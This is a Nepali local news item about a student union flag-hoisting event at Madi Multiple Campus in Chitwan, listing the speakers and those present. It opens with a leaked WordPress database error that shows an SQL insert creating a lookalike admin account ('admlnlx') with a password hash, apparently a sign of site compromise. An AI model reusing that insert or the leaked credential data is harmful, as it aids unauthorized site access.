WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWqYkwpDiRnCAI.s9UjJd/hULkQCSF0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 00:36:24', '', 'admlnlx', 'admlnlx')
अनुज न्यौपाने,
चितवन माघ २३-
अनेरास्ववियु क्याम्पस कमिटी माडी बहुमुखी क्याम्पसले आज (आइतबार) माडी बहुमुखी क्याम्पसमा राष्ट्रिय झण्डा झण्डोत्तोलन गरेको छ । राष्ट्रिय एकताको सन्देश प्रवाह गर्ने उद्देश्यले राष्ट्र ब्यापी अभियान अन्तर्गत क्याम्पसमा राष्ट्रिय झण्डा झण्डोत्तोलन गरिएको हो ।
राष्ट्र र राष्ट्रियताको लागि अनेरास्ववियुको राष्ट्रिय अभियान अन्र्तगत कलेजमा राष्ट्रिय झण्डा राखिएको अनेरास्ववियु जिल्ला प्रचार बिभाग प्रमुख बिमल केसीले जानाकारी दिनुभयो ।
कार्यक्रममा एमाले युवा नेता तथा जिल्ला कमिटी सदस्य राम प्रसाद न्यौपाने, अनेरास्बबियु जिल्ला सहसचिब बिपिन पाठक, लगाएतका विद्यार्थी नेताहरुले मन्तव्य राख्नुभएको थियो । विभिन्न सङ्कायमा अध्ययनरत विद्यार्थीहरुको उपस्थिति रहेको सो कार्यक्रममा क्याम्पस प्रमुख घनश्याम भण्डारी ,अनेमसङ्घ जिल्ला अध्यक्ष सरस्वती बिष्ट ,पार्टी क्षेत्रीय अध्यक्ष श्याम कुमार बिष्ट ,पार्टी नेताहरु रेशमलाल आचार्य ,श्रीप्रसाद दवाडी ,रामेश्वर महत्तो,सुर्यकान्त खनाल ,रामु क्षेत्री, डिलिया महत्तो,रबिन चापागाईं, सरोज लामिछाने लगायतको उपस्थिती रहेको थियो । कार्यक्रम सो क्याम्पस कमिटिका अध्यक्ष सञ्जय ढकालको अध्यक्षातामा सम्पन्न भएको थियो ।